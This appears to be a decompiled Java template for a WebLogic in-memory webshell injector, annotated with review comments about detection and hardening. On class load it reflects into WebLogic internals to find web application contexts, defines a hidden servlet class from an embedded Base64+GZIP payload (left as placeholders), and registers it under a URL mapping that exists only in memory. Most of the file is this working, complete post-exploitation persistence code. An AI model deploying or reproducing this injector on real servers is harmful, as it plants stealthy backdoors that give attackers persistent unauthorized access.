package com.reajason.javaweb.memshell.injector.weblogic;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Map;
import java.util.Set;
import java.util.zip.GZIPInputStream;
import javax.servlet.Servlet;

/* loaded from: input_file:com/reajason/javaweb/memshell/injector/weblogic/WebLogicServletInjector.class */
/**
 * Decompiled template of a WebLogic in-memory servlet ("memshell") injector.
 *
 * <p>Behaviour visible in this file: when the class is initialised, the static
 * block at the bottom constructs an instance, and the constructor (1) collects
 * web application contexts via reflection on WebLogic internals, (2) obtains a
 * servlet instance, defining its class from an embedded Base64+GZIP payload if
 * it is not already loadable, and (3) adds a URL-pattern entry for that servlet
 * to each context's servlet mapping. This class performs no file writes.
 *
 * <p>The three {@code {{...}}} strings are unfilled template placeholders;
 * presumably a generator substitutes them before the class is used (not shown
 * here).
 *
 * <p>Review notes for detection and hardening, derived from the code below:
 * <ul>
 *   <li>{@link #inject} prints the fixed strings "servlet already injected" and
 *       "servlet inject successful" to standard output, and the constructor
 *       prints a stack trace on failure; both end up wherever the server's
 *       stdout/stderr are captured.</li>
 *   <li>The servlet is registered by writing directly to the mapping object
 *       returned by {@code getServletMapping}, so the resulting URL pattern has
 *       no counterpart in any deployment descriptor. Comparing runtime servlet
 *       mappings against the deployed descriptors surfaces such entries.</li>
 *   <li>{@link #getShell} calls {@code ClassLoader.defineClass} reflectively on
 *       raw bytes, so the defined class has no backing class file. On JDKs with
 *       strong encapsulation this {@code setAccessible} call is expected to fail
 *       unless {@code java.lang} has been opened to the caller (for example via
 *       {@code --add-opens}); keeping such options off server command lines
 *       narrows this path. NOTE(review): confirm against the JDK in use.</li>
 * </ul>
 */
public class WebLogicServletInjector {
    /** Returns the URL pattern to register; an unfilled template placeholder in this file. */
    public String getUrlPattern() {
        return "{{urlPattern}}";
    }

    /**
     * Returns the class name of the servlet to load or define; an unfilled
     * template placeholder in this file. Also used as the servlet name passed to
     * the {@code ServletStubImpl} constructor in {@link #inject}.
     */
    public String getClassName() {
        return "{{className}}";
    }

    /**
     * Returns the embedded payload; an unfilled template placeholder in this
     * file. {@link #getShell} treats the value as Base64 text wrapping
     * GZIP-compressed class bytes.
     */
    public String getBase64String() throws IOException {
        return "{{base64Str}}";
    }

    /**
     * Runs the whole injection: for every context returned by
     * {@link #getContext()}, obtains a servlet instance and registers it.
     * Any {@link Exception} aborts the loop and is printed, not rethrown.
     */
    public WebLogicServletInjector() {
        try {
            for (Object obj : getContext()) {
                inject(obj, getShell(obj));
            }
        } catch (Exception e) {
            // Leaves a stack trace on stderr; a possible artifact in server logs.
            e.printStackTrace();
        }
    }

    /**
     * Collects web application contexts through the server runtime object.
     *
     * <p>Reflectively calls the static {@code weblogic.t3.srvr.ServerRuntime.theOne()},
     * then {@code getApplicationRuntimes()} on the result, and for each returned
     * element reads a {@code context} field from (a) every element of
     * {@code getComponentRuntimes()} and (b) every element of its {@code children}
     * field. Only values that are instances of
     * {@code weblogic.servlet.internal.WebAppServletContext} are kept.
     *
     * @return the distinct contexts found, possibly empty
     * @throws Throwable if the runtime classes or the two top-level accessors
     *         cannot be resolved or invoked; per-application failures are swallowed
     */
    public static Object[] getContextsByMbean() throws Throwable {
        HashSet hashSet = new HashSet();
        Class<?> cls = Class.forName("weblogic.t3.srvr.ServerRuntime");
        Class<?> cls2 = Class.forName("weblogic.servlet.internal.WebAppServletContext");
        Method method = cls.getMethod("theOne", new Class[0]);
        method.setAccessible(true);
        // Null receiver: theOne is invoked as a static method.
        Object invoke = method.invoke(null, new Object[0]);
        Method method2 = invoke.getClass().getMethod("getApplicationRuntimes", new Class[0]);
        method2.setAccessible(true);
        // The result is handled as an array via java.lang.reflect.Array.
        Object invoke2 = method2.invoke(invoke, new Object[0]);
        int length = Array.getLength(invoke2);
        for (int i = 0; i < length; i++) {
            Object obj = Array.get(invoke2, i);
            // Source 1: the "context" field of each component runtime.
            try {
                Object invoke3 = obj.getClass().getMethod("getComponentRuntimes", new Class[0]).invoke(obj, new Object[0]);
                int length2 = Array.getLength(invoke3);
                for (int i2 = 0; i2 < length2; i2++) {
                    Object fieldValue = getFieldValue(Array.get(invoke3, i2), "context");
                    if (cls2.isInstance(fieldValue)) {
                        hashSet.add(fieldValue);
                    }
                }
            } catch (Throwable th) {
                // Swallowed; processing continues with source 2 for this element.
            }
            // Source 2: the "context" field of each entry in the "children" set.
            try {
                Iterator it = ((Set) getFieldValue(obj, "children")).iterator();
                while (it.hasNext()) {
                    try {
                        Object fieldValue2 = getFieldValue(it.next(), "context");
                        if (cls2.isInstance(fieldValue2)) {
                            hashSet.add(fieldValue2);
                        }
                    } catch (Throwable th2) {
                        // Swallowed per child.
                    }
                }
            } catch (Throwable th3) {
                // Swallowed; the outer loop moves on to the next element.
            }
        }
        return hashSet.toArray();
    }

    /**
     * Collects contexts by inspecting private state of threads in the current
     * thread's {@link ThreadGroup}.
     *
     * <p>For each enumerated thread it reads a {@code workEntry} field and then
     * looks for a context at {@code workEntry.connectionHandler.request.context},
     * falling back to {@code workEntry.context}. Unlike
     * {@link #getContextsByMbean()}, no type check is applied to the value found.
     *
     * @return the distinct non-null values found, possibly empty
     * @throws Throwable on reflection failures outside the inner try block
     */
    public static Object[] getContextsByThreads() throws Throwable {
        Object fieldValue;
        Object fieldValue2;
        HashSet hashSet = new HashSet();
        ThreadGroup threadGroup = Thread.currentThread().getThreadGroup();
        int activeCount = threadGroup.activeCount();
        Thread[] threadArr = new Thread[activeCount];
        threadGroup.enumerate(threadArr);
        for (int i = 0; i < activeCount; i++) {
            Thread thread = threadArr[i];
            if (thread != null && (fieldValue = getFieldValue(thread, "workEntry")) != null) {
                try {
                    Object obj = null;
                    // Preferred path: the context attached to the thread's current request.
                    Object fieldValue3 = getFieldValue(fieldValue, "connectionHandler");
                    if (fieldValue3 != null && (fieldValue2 = getFieldValue(fieldValue3, "request")) != null) {
                        obj = getFieldValue(fieldValue2, "context");
                    }
                    // Fallback path: a "context" field directly on the work entry.
                    if (obj == null) {
                        obj = getFieldValue(fieldValue, "context");
                    }
                    if (obj != null) {
                        hashSet.add(obj);
                    }
                } catch (Throwable th) {
                    // Swallowed per thread.
                }
            }
        }
        return hashSet.toArray();
    }

    /**
     * Returns the union of {@link #getContextsByMbean()} and
     * {@link #getContextsByThreads()}. A failure of either strategy is swallowed,
     * so the result may be empty and this method never throws.
     */
    public static Object[] getContext() {
        HashSet hashSet = new HashSet();
        try {
            hashSet.addAll(Arrays.asList(getContextsByMbean()));
        } catch (Throwable th) {
            // Swallowed; the thread-based strategy is still attempted.
        }
        try {
            hashSet.addAll(Arrays.asList(getContextsByThreads()));
        } catch (Throwable th2) {
            // Swallowed; whatever was collected so far is returned.
        }
        return hashSet.toArray();
    }

    /**
     * Produces an instance of the class named by {@link #getClassName()}.
     *
     * <p>First tries to load the class through the thread context class loader
     * (or the loader of {@code obj}'s class when that is null). If that fails for
     * any {@link Exception}, the embedded payload is Base64-decoded,
     * GZIP-decompressed, and passed to {@code ClassLoader.defineClass(byte[], int, int)}
     * on the same loader via reflection.
     *
     * @param obj a context object, used only to find a fallback class loader
     * @return a new instance of the loaded or newly defined class
     * @throws Exception if decoding, class definition, or instantiation fails
     */
    private Object getShell(Object obj) throws Exception {
        ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
        if (contextClassLoader == null) {
            contextClassLoader = obj.getClass().getClassLoader();
        }
        try {
            // Succeeds when the class is already loadable by this loader.
            return contextClassLoader.loadClass(getClassName()).newInstance();
        } catch (Exception e) {
            byte[] gzipDecompress = gzipDecompress(decodeBase64(getBase64String()));
            // Reflective access to a non-public java.lang.ClassLoader method: the class is
            // defined from in-memory bytes, so it has no backing class file.
            Method declaredMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
            declaredMethod.setAccessible(true);
            return ((Class) declaredMethod.invoke(contextClassLoader, gzipDecompress, 0, Integer.valueOf(gzipDecompress.length))).newInstance();
        }
    }

    /**
     * Registers a servlet under {@link #getUrlPattern()} in one context.
     *
     * <p>Builds a {@code weblogic.servlet.internal.ServletStubImpl} for the
     * servlet, wraps it in a {@code weblogic.servlet.internal.URLMatchHelper},
     * and stores it in the object returned by the context's
     * {@code getServletMapping} method, unless an entry for the pattern already
     * exists. The outcome is printed to standard output either way.
     *
     * @param obj the context; passed to constructors that declare a
     *        {@code WebAppServletContext} parameter
     * @param obj2 the servlet instance; passed where a {@link Servlet} is declared
     * @throws Exception on any reflection failure other than the handled
     *         {@link NoSuchMethodException} of the first constructor lookup
     */
    public void inject(Object obj, Object obj2) throws Exception {
        Object newInstance;
        // invokeMethod uses getDeclaredMethod, so getServletMapping must be declared
        // directly on obj's runtime class.
        Object invokeMethod = invokeMethod(obj, "getServletMapping", null, null);
        Class<?> cls = Class.forName("weblogic.servlet.internal.WebAppServletContext");
        Class<?> cls2 = Class.forName("weblogic.servlet.internal.ServletStubImpl");
        try {
            // First constructor shape: (name, servlet instance, context).
            Constructor<?> declaredConstructor = cls2.getDeclaredConstructor(String.class, Servlet.class, cls);
            declaredConstructor.setAccessible(true);
            newInstance = declaredConstructor.newInstance(getClassName(), obj2, obj);
        } catch (NoSuchMethodException e) {
            // Alternative constructor shape: (String, String, context, Map). Here the class
            // name is passed twice and obj2 is not handed to the stub.
            // NOTE(review): presumably a different WebLogic version - confirm.
            Constructor<?> declaredConstructor2 = cls2.getDeclaredConstructor(String.class, String.class, cls, Map.class);
            declaredConstructor2.setAccessible(true);
            newInstance = declaredConstructor2.newInstance(getClassName(), getClassName(), obj, null);
        }
        Constructor<?> declaredConstructor3 = Class.forName("weblogic.servlet.internal.URLMatchHelper").getDeclaredConstructor(String.class, cls2);
        declaredConstructor3.setAccessible(true);
        Object newInstance2 = declaredConstructor3.newInstance(getUrlPattern(), newInstance);
        // An existing entry for the pattern is left untouched.
        if (invokeMethod(invokeMethod, "get", new Class[]{String.class}, new Object[]{getUrlPattern()}) != null) {
            System.out.println("servlet already injected");
        } else {
            // Direct write to the runtime mapping: the new pattern exists only in memory
            // and has no deployment-descriptor counterpart.
            invokeMethod(invokeMethod, "put", new Class[]{String.class, Object.class}, new Object[]{getUrlPattern(), newInstance2});
            System.out.println("servlet inject successful");
        }
    }

    /**
     * Decodes a Base64 string using whichever decoder is available, resolved by
     * name at run time: {@code java.util.Base64} first, then
     * {@code sun.misc.BASE64Decoder} if the first attempt throws.
     *
     * @param str Base64 text
     * @return the decoded bytes
     * @throws Exception if both decoders are unavailable or decoding fails
     */
    public static byte[] decodeBase64(String str) throws Exception {
        try {
            Object invoke = Class.forName("java.util.Base64").getMethod("getDecoder", new Class[0]).invoke(null, new Object[0]);
            return (byte[]) invoke.getClass().getMethod("decode", String.class).invoke(invoke, str);
        } catch (Exception e) {
            // Any failure above, including a decode error, falls through to this decoder.
            Class<?> cls = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) cls.getMethod("decodeBuffer", String.class).invoke(cls.newInstance(), str);
        }
    }

    /**
     * Inflates a GZIP-compressed byte array fully into memory.
     *
     * @param bArr GZIP data
     * @return the decompressed bytes
     * @throws IOException if the input is not valid GZIP data or reading fails
     */
    public static byte[] gzipDecompress(byte[] bArr) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        GZIPInputStream gZIPInputStream = null;
        try {
            gZIPInputStream = new GZIPInputStream(new ByteArrayInputStream(bArr));
            byte[] bArr2 = new byte[4096];
            while (true) {
                int read = gZIPInputStream.read(bArr2);
                // Stops on end of stream (-1) and also on a zero-length read.
                if (read <= 0) {
                    break;
                }
                byteArrayOutputStream.write(bArr2, 0, read);
            }
            byte[] byteArray = byteArrayOutputStream.toByteArray();
            if (gZIPInputStream != null) {
                gZIPInputStream.close();
            }
            byteArrayOutputStream.close();
            return byteArray;
        } catch (Throwable th) {
            // Both streams are closed on the failure path before rethrowing.
            if (gZIPInputStream != null) {
                gZIPInputStream.close();
            }
            byteArrayOutputStream.close();
            throw th;
        }
    }

    /**
     * Invokes a method by name regardless of its access modifier.
     *
     * <p>The lookup uses {@code getDeclaredMethod} on {@code obj}'s runtime class
     * only; methods declared solely on a superclass are not found.
     *
     * @param obj receiver
     * @param str method name
     * @param clsArr parameter types, or {@code null} for none
     * @param objArr arguments, or {@code null} for none
     * @return the method's return value
     * @throws Exception on lookup, access, or invocation failure
     */
    public static Object invokeMethod(Object obj, String str, Class<?>[] clsArr, Object[] objArr) throws Exception {
        Method declaredMethod = obj.getClass().getDeclaredMethod(str, clsArr);
        declaredMethod.setAccessible(true);
        return declaredMethod.invoke(obj, objArr);
    }

    /**
     * Reads a field by name regardless of its access modifier, searching
     * {@code obj}'s class and then each superclass up to, but not including,
     * {@link Object}.
     *
     * @param obj the object to read from
     * @param str field name
     * @return the field's value, which may be {@code null}
     * @throws NoSuchFieldException if no class in the hierarchy declares the field
     * @throws IllegalAccessException if the field cannot be read
     */
    public static Object getFieldValue(Object obj, String str) throws NoSuchFieldException, IllegalAccessException {
        Class<?> cls = obj.getClass();
        while (true) {
            Class<?> cls2 = cls;
            if (cls2 == Object.class) {
                throw new NoSuchFieldException(str);
            }
            try {
                Field declaredField = cls2.getDeclaredField(str);
                declaredField.setAccessible(true);
                return declaredField.get(obj);
            } catch (NoSuchFieldException e) {
                // Not declared at this level; continue with the parent class.
                cls = cls2.getSuperclass();
            }
        }
    }

    // Class initialisation is the trigger: merely loading and initialising this class
    // runs the constructor, and with it the whole injection, with no explicit call.
    static {
        new WebLogicServletInjector();
    }
}
